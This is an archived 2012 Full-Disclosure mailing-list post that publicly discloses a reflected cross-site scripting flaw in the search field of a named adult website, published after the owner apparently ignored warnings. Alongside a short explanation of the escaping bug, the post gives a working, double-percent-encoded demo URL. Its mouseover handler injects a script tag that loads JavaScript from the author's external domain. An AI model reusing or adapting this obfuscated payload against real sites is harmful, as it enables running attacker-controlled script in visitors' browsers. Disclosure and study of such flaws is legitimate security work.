lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 21 Apr 2012 05:05:31 +0200
From: klondike <klondike@...cosoft.es>
To: full-disclosure@...ts.grok.org.uk
Subject: XSS parameter injection in the search field of
	http://chicasdetorbe.com

Hello,
Yesterday I discovered a funny XSS injection in the website
http://chicasdetorbe.com which is an affiliate site of the popular
website http://www.putalocura.com/

Despite my efforts at contacting with the site owner I received silence
as answer, I suppose because he though this was either not serious or he
just wanted to ignore me. Thus after the having sent various warnings of
Full Disclosure I have decided to publish the whole thing.

The vulnerability:
The vulnerability is quite simple, the contents of the search string are
pasted escaping characters like ' " and \ inside the value field of the
input thus you can insert which ever attributes you want which allows
for event based injection as long as you don't use the characters ' " or
\ since they will be escaped with an extra \.

Take into account that even if they tried to detect dangerous strings
this would be bypasable by adding <> since those are removed by the
content manager.

The demo (the site is NSFW so be careful):
1. Go to:
http://chicasdetorbe.com/?q=%22+onMouseOver%3Deval%28unescape%28%2F%2573%253d%2564%256f%2563%2575%256d%2565%256e%2574%252e%2563%2572%2565%2561%2574%2565%2545%256c%2565%256d%2565%256e%2574%2528%2527%2573%2563%2572%2569%2570%2574%2527%2529%253b%2573%252e%2573%2572%2563%253d%2527%2568%2574%2574%2570%253a%252f%252f%256b%256c%256f%256e%2564%2569%256b%2565%252e%2565%2573%252f%2564%2565%256d%256f%2574%256f%2572%2562%2565%252e%256a%2573%2527%253b%2564%256f%2563%2575%256d%2565%256e%2574%252e%2567%2565%2574%2545%256c%2565%256d%2565%256e%2574%2573%2542%2579%2554%2561%2567%254e%2561%256d%2565%2528%2527%2568%2565%2561%2564%2527%2529%255b%2530%255d%252e%2561%2570%2570%2565%256e%2564%2543%2568%2569%256c%2564%2528%2573%2529%253b%2F.source%29%29%2F%2F
(You may need to copy and paste the whole link).
2.Put the mouse over the search bar on the top left.
3. Enjoy! (The text is in Spanish and basically offer links to free porn
and photos of chonis: a social group in Spain).

klondike


Download attachment "signature.asc" of type "application/pgp-signature" (263 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ